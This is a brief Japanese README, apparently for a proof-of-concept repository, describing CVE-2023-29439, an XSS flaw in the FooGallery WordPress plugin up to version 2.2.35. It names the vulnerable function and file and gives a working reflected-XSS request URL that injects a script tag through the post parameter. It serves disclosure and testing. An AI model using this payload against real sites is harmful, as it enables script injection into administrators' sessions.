
CVE-2023-29439 の PoC
このリポジトリは、WordPress Foogallery プラグインの XSS 脆弱性に関するものです。
Foogallery 2.2.35 以前では、foogallery/includes/admin/class-gallery-attachment-modal.php 内の foogallery_image_editor_modal 関数が XSS 攻撃に対して脆弱です。
http://localhost:8080/wp-admin/post-new.php?post_type=foogallery&post=”><script>alert(1)</script> を送信する